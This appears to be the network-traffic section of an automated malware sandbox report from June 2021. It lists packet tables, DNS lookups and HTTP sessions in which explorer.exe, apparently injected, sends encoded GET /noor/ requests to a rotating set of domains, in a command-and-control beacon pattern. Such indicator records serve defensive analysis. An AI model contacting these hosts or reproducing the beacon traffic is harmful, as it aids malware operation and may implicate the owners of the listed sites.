                                                                                                        Jun 11, 2021 15:43:48.276607990 CEST804977034.215.126.147192.168.2.4
                                                                                                        Jun 11, 2021 15:43:48.276632071 CEST804977034.215.126.147192.168.2.4
                                                                                                        Jun 11, 2021 15:43:48.276801109 CEST4977080192.168.2.434.215.126.147
                                                                                                        Jun 11, 2021 15:43:48.276842117 CEST804977034.215.126.147192.168.2.4
                                                                                                        Jun 11, 2021 15:43:48.276916981 CEST4977080192.168.2.434.215.126.147
                                                                                                        Jun 11, 2021 15:43:48.276928902 CEST4977080192.168.2.434.215.126.147
                                                                                                        Jun 11, 2021 15:43:48.484210968 CEST804977034.215.126.147192.168.2.4
                                                                                                        Jun 11, 2021 15:43:53.531666994 CEST4977380192.168.2.4154.201.212.113
                                                                                                        Jun 11, 2021 15:43:53.841697931 CEST8049773154.201.212.113192.168.2.4
                                                                                                        Jun 11, 2021 15:43:53.841862917 CEST4977380192.168.2.4154.201.212.113
                                                                                                        Jun 11, 2021 15:43:53.842042923 CEST4977380192.168.2.4154.201.212.113
                                                                                                        Jun 11, 2021 15:43:54.154320955 CEST8049773154.201.212.113192.168.2.4
                                                                                                        Jun 11, 2021 15:43:54.162775993 CEST8049773154.201.212.113192.168.2.4
                                                                                                        Jun 11, 2021 15:43:54.163003922 CEST4977380192.168.2.4154.201.212.113
                                                                                                        Jun 11, 2021 15:43:54.248183966 CEST4977380192.168.2.4154.201.212.113
                                                                                                        Jun 11, 2021 15:43:54.558937073 CEST8049773154.201.212.113192.168.2.4
                                                                                                        Jun 11, 2021 15:43:59.368149996 CEST4977480192.168.2.4104.16.13.194
                                                                                                        Jun 11, 2021 15:43:59.410598040 CEST8049774104.16.13.194192.168.2.4
                                                                                                        Jun 11, 2021 15:43:59.410761118 CEST4977480192.168.2.4104.16.13.194
                                                                                                        Jun 11, 2021 15:43:59.411068916 CEST4977480192.168.2.4104.16.13.194
                                                                                                        Jun 11, 2021 15:43:59.454530954 CEST8049774104.16.13.194192.168.2.4
                                                                                                        Jun 11, 2021 15:43:59.492834091 CEST8049774104.16.13.194192.168.2.4
                                                                                                        Jun 11, 2021 15:43:59.492862940 CEST8049774104.16.13.194192.168.2.4
                                                                                                        Jun 11, 2021 15:43:59.492878914 CEST8049774104.16.13.194192.168.2.4
                                                                                                        Jun 11, 2021 15:43:59.492907047 CEST8049774104.16.13.194192.168.2.4
                                                                                                        Jun 11, 2021 15:43:59.492919922 CEST8049774104.16.13.194192.168.2.4
                                                                                                        Jun 11, 2021 15:43:59.492932081 CEST8049774104.16.13.194192.168.2.4
                                                                                                        Jun 11, 2021 15:43:59.492944002 CEST8049774104.16.13.194192.168.2.4
                                                                                                        Jun 11, 2021 15:43:59.492953062 CEST8049774104.16.13.194192.168.2.4
                                                                                                        Jun 11, 2021 15:43:59.492960930 CEST8049774104.16.13.194192.168.2.4
                                                                                                        Jun 11, 2021 15:43:59.492969036 CEST8049774104.16.13.194192.168.2.4
                                                                                                        Jun 11, 2021 15:43:59.493149042 CEST4977480192.168.2.4104.16.13.194
                                                                                                        Jun 11, 2021 15:43:59.493253946 CEST4977480192.168.2.4104.16.13.194
                                                                                                        Jun 11, 2021 15:43:59.493427038 CEST4977480192.168.2.4104.16.13.194
                                                                                                        Jun 11, 2021 15:44:04.637413979 CEST4977580192.168.2.4142.250.180.243
                                                                                                        Jun 11, 2021 15:44:04.700712919 CEST8049775142.250.180.243192.168.2.4
                                                                                                        Jun 11, 2021 15:44:04.700810909 CEST4977580192.168.2.4142.250.180.243
                                                                                                        Jun 11, 2021 15:44:04.701019049 CEST4977580192.168.2.4142.250.180.243
                                                                                                        Jun 11, 2021 15:44:04.765010118 CEST8049775142.250.180.243192.168.2.4
                                                                                                        Jun 11, 2021 15:44:04.809139967 CEST8049775142.250.180.243192.168.2.4
                                                                                                        Jun 11, 2021 15:44:04.809257984 CEST8049775142.250.180.243192.168.2.4
                                                                                                        Jun 11, 2021 15:44:04.809343100 CEST4977580192.168.2.4142.250.180.243
                                                                                                        Jun 11, 2021 15:44:04.809423923 CEST4977580192.168.2.4142.250.180.243
                                                                                                        Jun 11, 2021 15:44:04.872476101 CEST8049775142.250.180.243192.168.2.4
                                                                                                        Jun 11, 2021 15:44:09.905366898 CEST4977680192.168.2.445.87.1.159
                                                                                                        Jun 11, 2021 15:44:09.959625006 CEST804977645.87.1.159192.168.2.4
                                                                                                        Jun 11, 2021 15:44:09.959851980 CEST4977680192.168.2.445.87.1.159
                                                                                                        Jun 11, 2021 15:44:09.959887981 CEST4977680192.168.2.445.87.1.159
                                                                                                        Jun 11, 2021 15:44:10.011744976 CEST804977645.87.1.159192.168.2.4
                                                                                                        Jun 11, 2021 15:44:10.011770010 CEST804977645.87.1.159192.168.2.4
                                                                                                        Jun 11, 2021 15:44:10.011779070 CEST804977645.87.1.159192.168.2.4
                                                                                                        Jun 11, 2021 15:44:10.011972904 CEST4977680192.168.2.445.87.1.159
                                                                                                        Jun 11, 2021 15:44:10.012043953 CEST4977680192.168.2.445.87.1.159
                                                                                                        Jun 11, 2021 15:44:10.063390970 CEST804977645.87.1.159192.168.2.4

                                                                                                        UDP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Jun 11, 2021 15:42:01.233787060 CEST53545318.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:02.464631081 CEST4971453192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:02.514976978 CEST53497148.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:02.547041893 CEST5802853192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:02.606267929 CEST53580288.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:02.864402056 CEST5309753192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:02.915596962 CEST53530978.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:04.287547112 CEST4925753192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:04.340919018 CEST53492578.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:04.506211996 CEST6238953192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:04.567045927 CEST53623898.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:05.913096905 CEST4991053192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:05.967725992 CEST53499108.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:07.133013964 CEST5585453192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:07.185890913 CEST53558548.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:08.238662004 CEST6454953192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:08.289069891 CEST53645498.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:09.172849894 CEST6315353192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:09.223556995 CEST53631538.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:10.113800049 CEST5299153192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:10.163866043 CEST53529918.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:11.088670969 CEST5370053192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:11.141144991 CEST53537008.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:12.074021101 CEST5172653192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:12.123920918 CEST53517268.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:13.007347107 CEST5679453192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:13.069133997 CEST53567948.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:14.407571077 CEST5653453192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:14.458976984 CEST53565348.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:15.352391005 CEST5662753192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:15.402287960 CEST53566278.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:16.481600046 CEST5662153192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:16.533114910 CEST53566218.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:19.058721066 CEST6311653192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:19.108803988 CEST53631168.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:19.990513086 CEST6407853192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:20.040512085 CEST53640788.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:21.823307037 CEST6480153192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:21.875020981 CEST53648018.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:23.316617012 CEST6172153192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:23.369497061 CEST53617218.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:25.733527899 CEST5125553192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:25.783677101 CEST53512558.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:29.644226074 CEST6152253192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:29.697156906 CEST53615228.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:32.272378922 CEST5233753192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:32.336707115 CEST53523378.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:54.736193895 CEST5504653192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:54.872735977 CEST53550468.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:55.510097027 CEST4961253192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:55.574306965 CEST53496128.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:55.754501104 CEST4928553192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:55.816036940 CEST53492858.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:56.190381050 CEST5060153192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:56.389650106 CEST53506018.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:56.665556908 CEST6087553192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:56.735917091 CEST53608758.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:56.831643105 CEST5644853192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:56.895271063 CEST53564488.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:57.712440968 CEST5917253192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:57.773936987 CEST53591728.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:58.560173035 CEST6242053192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:58.621927977 CEST53624208.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:42:59.044015884 CEST6057953192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:42:59.103401899 CEST53605798.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:43:03.946119070 CEST5018353192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:43:04.004652023 CEST53501838.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:43:04.813700914 CEST6153153192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:43:04.874716043 CEST53615318.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:43:05.390511036 CEST4922853192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:43:05.442178011 CEST53492288.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:43:14.321829081 CEST5979453192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:43:14.381587029 CEST53597948.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:43:15.988770962 CEST5591653192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:43:16.990122080 CEST5591653192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:43:18.036716938 CEST5591653192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:43:20.083448887 CEST5591653192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:43:21.040838957 CEST53559168.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:43:22.042254925 CEST53559168.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:43:23.101794004 CEST53559168.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:43:25.137603045 CEST53559168.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:43:26.056363106 CEST5275253192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:43:26.136188030 CEST53527528.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:43:31.177478075 CEST6054253192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:43:31.378711939 CEST53605428.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:43:37.057245016 CEST6068953192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:43:37.140068054 CEST53606898.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:43:42.346167088 CEST6420653192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:43:42.415394068 CEST53642068.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:43:47.781565905 CEST5090453192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:43:47.857657909 CEST53509048.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:43:50.467176914 CEST5752553192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:43:50.537082911 CEST53575258.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:43:52.834855080 CEST5381453192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:43:52.907649994 CEST53538148.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:43:53.465754986 CEST5341853192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:43:53.530381918 CEST53534188.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:43:59.267298937 CEST6283353192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:43:59.366755009 CEST53628338.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:44:04.548671007 CEST5926053192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:44:04.635085106 CEST53592608.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:44:09.826103926 CEST4994453192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:44:09.903970003 CEST53499448.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:44:15.028630018 CEST6330053192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:44:16.041974068 CEST6330053192.168.2.48.8.8.8
                                                                                                        Jun 11, 2021 15:44:16.264545918 CEST53633008.8.8.8192.168.2.4
                                                                                                        Jun 11, 2021 15:44:17.269870996 CEST53633008.8.8.8192.168.2.4

                                                                                                        ICMP Packets

                                                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                                                        Jun 11, 2021 15:43:22.045766115 CEST192.168.2.48.8.8.8cffa(Port unreachable)Destination Unreachable
                                                                                                        Jun 11, 2021 15:43:23.101996899 CEST192.168.2.48.8.8.8cffa(Port unreachable)Destination Unreachable
                                                                                                        Jun 11, 2021 15:43:25.137748003 CEST192.168.2.48.8.8.8cffa(Port unreachable)Destination Unreachable
                                                                                                        Jun 11, 2021 15:44:17.271176100 CEST192.168.2.48.8.8.8cff5(Port unreachable)Destination Unreachable

                                                                                                        DNS Queries

                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                        Jun 11, 2021 15:43:15.988770962 CEST192.168.2.48.8.8.80xa124Standard query (0)www.tcheaptvwdmall.comA (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:16.990122080 CEST192.168.2.48.8.8.80xa124Standard query (0)www.tcheaptvwdmall.comA (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:18.036716938 CEST192.168.2.48.8.8.80xa124Standard query (0)www.tcheaptvwdmall.comA (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:20.083448887 CEST192.168.2.48.8.8.80xa124Standard query (0)www.tcheaptvwdmall.comA (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:26.056363106 CEST192.168.2.48.8.8.80xf2fcStandard query (0)www.jarsofjoybylinathomas.comA (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:31.177478075 CEST192.168.2.48.8.8.80xb33Standard query (0)www.trueandbare.comA (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:37.057245016 CEST192.168.2.48.8.8.80x45beStandard query (0)www.velvetlaceextensions.comA (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:42.346167088 CEST192.168.2.48.8.8.80xb7c8Standard query (0)www.pinnacleautism.comA (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:47.781565905 CEST192.168.2.48.8.8.80x2d90Standard query (0)www.scgcarriers.comA (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:53.465754986 CEST192.168.2.48.8.8.80xd745Standard query (0)www.customtiletables.comA (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:59.267298937 CEST192.168.2.48.8.8.80xd347Standard query (0)www.marryobaidanjum.comA (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:44:04.548671007 CEST192.168.2.48.8.8.80x7eb6Standard query (0)www.astromaritravel.comA (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:44:09.826103926 CEST192.168.2.48.8.8.80x38fcStandard query (0)www.plafon.oneA (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:44:15.028630018 CEST192.168.2.48.8.8.80x7a05Standard query (0)www.voyagoezy.comA (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:44:16.041974068 CEST192.168.2.48.8.8.80x7a05Standard query (0)www.voyagoezy.comA (IP address)IN (0x0001)

                                                                                                        DNS Answers

                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                        Jun 11, 2021 15:43:21.040838957 CEST8.8.8.8192.168.2.40xa124Server failure (2)www.tcheaptvwdmall.comnonenoneA (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:22.042254925 CEST8.8.8.8192.168.2.40xa124Server failure (2)www.tcheaptvwdmall.comnonenoneA (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:23.101794004 CEST8.8.8.8192.168.2.40xa124Server failure (2)www.tcheaptvwdmall.comnonenoneA (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:25.137603045 CEST8.8.8.8192.168.2.40xa124Server failure (2)www.tcheaptvwdmall.comnonenoneA (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:26.136188030 CEST8.8.8.8192.168.2.40xf2fcName error (3)www.jarsofjoybylinathomas.comnonenoneA (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:31.378711939 CEST8.8.8.8192.168.2.40xb33No error (0)www.trueandbare.comtrueandbare.comCNAME (Canonical name)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:31.378711939 CEST8.8.8.8192.168.2.40xb33No error (0)trueandbare.com162.144.21.92A (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:37.140068054 CEST8.8.8.8192.168.2.40x45beNo error (0)www.velvetlaceextensions.comwww124.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:37.140068054 CEST8.8.8.8192.168.2.40x45beNo error (0)www124.wixdns.netbalancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:37.140068054 CEST8.8.8.8192.168.2.40x45beNo error (0)balancer.wixdns.net5f36b111-balancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:37.140068054 CEST8.8.8.8192.168.2.40x45beNo error (0)5f36b111-balancer.wixdns.nettd-balancer-euw2-6-109.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:37.140068054 CEST8.8.8.8192.168.2.40x45beNo error (0)td-balancer-euw2-6-109.wixdns.net35.246.6.109A (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:42.415394068 CEST8.8.8.8192.168.2.40xb7c8No error (0)www.pinnacleautism.com74.208.236.54A (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:47.857657909 CEST8.8.8.8192.168.2.40x2d90No error (0)www.scgcarriers.com34.215.126.147A (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:47.857657909 CEST8.8.8.8192.168.2.40x2d90No error (0)www.scgcarriers.com52.27.144.245A (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:47.857657909 CEST8.8.8.8192.168.2.40x2d90No error (0)www.scgcarriers.com52.26.163.154A (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:53.530381918 CEST8.8.8.8192.168.2.40xd745No error (0)www.customtiletables.com154.201.212.113A (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:59.366755009 CEST8.8.8.8192.168.2.40xd347No error (0)www.marryobaidanjum.comtarget.clickfunnels.comCNAME (Canonical name)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:59.366755009 CEST8.8.8.8192.168.2.40xd347No error (0)target.clickfunnels.com104.16.13.194A (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:59.366755009 CEST8.8.8.8192.168.2.40xd347No error (0)target.clickfunnels.com104.16.14.194A (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:59.366755009 CEST8.8.8.8192.168.2.40xd347No error (0)target.clickfunnels.com104.16.15.194A (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:59.366755009 CEST8.8.8.8192.168.2.40xd347No error (0)target.clickfunnels.com104.16.12.194A (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:43:59.366755009 CEST8.8.8.8192.168.2.40xd347No error (0)target.clickfunnels.com104.16.16.194A (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:44:04.635085106 CEST8.8.8.8192.168.2.40x7eb6No error (0)www.astromaritravel.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)
                                                                                                        Jun 11, 2021 15:44:04.635085106 CEST8.8.8.8192.168.2.40x7eb6No error (0)ghs.googlehosted.com142.250.180.243A (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:44:09.903970003 CEST8.8.8.8192.168.2.40x38fcNo error (0)www.plafon.one45.87.1.159A (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:44:16.264545918 CEST8.8.8.8192.168.2.40x7a05Server failure (2)www.voyagoezy.comnonenoneA (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:44:17.269870996 CEST8.8.8.8192.168.2.40x7a05Server failure (2)www.voyagoezy.comnonenoneA (IP address)IN (0x0001)

                                                                                                        HTTP Request Dependency Graph

                                                                                                        • www.trueandbare.com
                                                                                                        • www.velvetlaceextensions.com
                                                                                                        • www.pinnacleautism.com
                                                                                                        • www.scgcarriers.com
                                                                                                        • www.customtiletables.com
                                                                                                        • www.marryobaidanjum.com
                                                                                                        • www.astromaritravel.com
                                                                                                        • www.plafon.one

                                                                                                        HTTP Packets

                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        0192.168.2.449767162.144.21.9280C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jun 11, 2021 15:43:31.572282076 CEST7426OUTGET /noor/?1bWh=4rG107LnOcmcuziIBv//fTWAPRyuaqL3ZCNKQGbegtiOA/J/96Y+2s4SPBA+G2lg6sqa&z6A=SROlIdu0 HTTP/1.1
                                                                                                        Host: www.trueandbare.com
                                                                                                        Connection: close
                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                        Data Ascii:
                                                                                                        Jun 11, 2021 15:43:32.045828104 CEST7427INHTTP/1.1 500 Internal Server Error
                                                                                                        Date: Fri, 11 Jun 2021 13:43:31 GMT
                                                                                                        Server: nginx/1.19.10
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Vary: Accept-Encoding
                                                                                                        X-Accel-Expires: 10800
                                                                                                        Connection: close
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Data Raw: 31 32 66 0d 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 46 61 74 61 6c 20 65 72 72 6f 72 3c 2f 62 3e 3a 20 20 43 6f 6d 70 6f 73 65 72 20 64 65 74 65 63 74 65 64 20 69 73 73 75 65 73 20 69 6e 20 79 6f 75 72 20 70 6c 61 74 66 6f 72 6d 3a 20 59 6f 75 72 20 43 6f 6d 70 6f 73 65 72 20 64 65 70 65 6e 64 65 6e 63 69 65 73 20 72 65 71 75 69 72 65 20 61 20 50 48 50 20 76 65 72 73 69 6f 6e 20 22 3e 3d 20 37 2e 32 2e 35 22 2e 20 59 6f 75 20 61 72 65 20 72 75 6e 6e 69 6e 67 20 37 2e 31 2e 31 34 2e 20 69 6e 20 3c 62 3e 2f 68 6f 6d 65 33 2f 77 61 6c 69 76 79 30 61 67 72 6a 69 2f 70 75 62 6c 69 63 5f 68 74 6d 6c 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 6d 6f 6a 6f 2d 6d 61 72 6b 65 74 70 6c 61 63 65 2d 77 70 2d 70 6c 75 67 69 6e 2f 76 65 6e 64 6f 72 2f 63 6f 6d 70 6f 73 65 72 2f 70 6c 61 74 66 6f 72 6d 5f 63 68 65 63 6b 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 32 34 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 0d 0a
                                                                                                        Data Ascii: 12f<br /><b>Fatal error</b>: Composer detected issues in your platform: Your Composer dependencies require a PHP version ">= 7.2.5". You are running 7.1.14. in <b>/home3/walivy0agrji/public_html/wp-content/plugins/mojo-marketplace-wp-plugin/vendor/composer/platform_check.php</b> on line <b>24</b><br />


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        1192.168.2.44976835.246.6.10980C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jun 11, 2021 15:43:37.207093000 CEST7428OUTGET /noor/?1bWh=HXv2ci8qflo+sTzlFu6p6ayrdzzy8jUJJ1L5hJzxjEzCyp3/Ui7nWA8VYIXOKVKH4kcG&z6A=SROlIdu0 HTTP/1.1
                                                                                                        Host: www.velvetlaceextensions.com
                                                                                                        Connection: close
                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                        Data Ascii:
                                                                                                        Jun 11, 2021 15:43:37.304081917 CEST7429INHTTP/1.1 301 Moved Permanently
                                                                                                        Date: Fri, 11 Jun 2021 13:43:37 GMT
                                                                                                        Content-Length: 0
                                                                                                        Connection: close
                                                                                                        location: https://www.velvetlaceextensions.com/noor?1bWh=HXv2ci8qflo+sTzlFu6p6ayrdzzy8jUJJ1L5hJzxjEzCyp3%2FUi7nWA8VYIXOKVKH4kcG&z6A=SROlIdu0
                                                                                                        strict-transport-security: max-age=120
                                                                                                        x-wix-request-id: 1623419017.259388871352119909
                                                                                                        Age: 0
                                                                                                        Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
                                                                                                        X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkViJbJpTSOylDzhXDpRcNc6B,qquldgcFrj2n046g4RNSVAWNqgzSMQ+UB9IQX4udZ+Q=,2d58ifebGbosy5xc+FRalikQrYGaAZBxosgzBLN+JS8WoQ0cHkvLnvmz+7b97nWc3fKEXQvQlSAkB/lstal9R8e13Bz+d7LxC9U/IJokgHI=,2UNV7KOq4oGjA5+PKsX47BxIqOBp/BcxgT00NVTD1Qk=,sqmudy1rWy5CXemzdhzS/KM53xST3ovxTqKNNNoSvJGTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,m86p0LbwQP79i4nFFg3YpsiRjT1D/AzZ+xl52uw09mCCz/JW/BPqA1Fu++wQa0OVCONUzZLbexpS3PEZaUF96g==
                                                                                                        Cache-Control: no-cache
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Server: Pepyaka/1.19.0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        2192.168.2.44976974.208.236.5480C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jun 11, 2021 15:43:42.578502893 CEST7430OUTGET /noor/?1bWh=yBBObmCyAJHV9q/laG6R4VeleE6hM9O/9rRknywdqzDMYOPfeqQhGmZFlzULPSD48dad&z6A=SROlIdu0 HTTP/1.1
                                                                                                        Host: www.pinnacleautism.com
                                                                                                        Connection: close
                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                        Data Ascii:
                                                                                                        Jun 11, 2021 15:43:42.745291948 CEST7431INHTTP/1.1 404 Not Found
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 1364
                                                                                                        Connection: close
                                                                                                        Date: Fri, 11 Jun 2021 13:43:42 GMT
                                                                                                        Server: Apache
                                                                                                        X-Frame-Options: deny
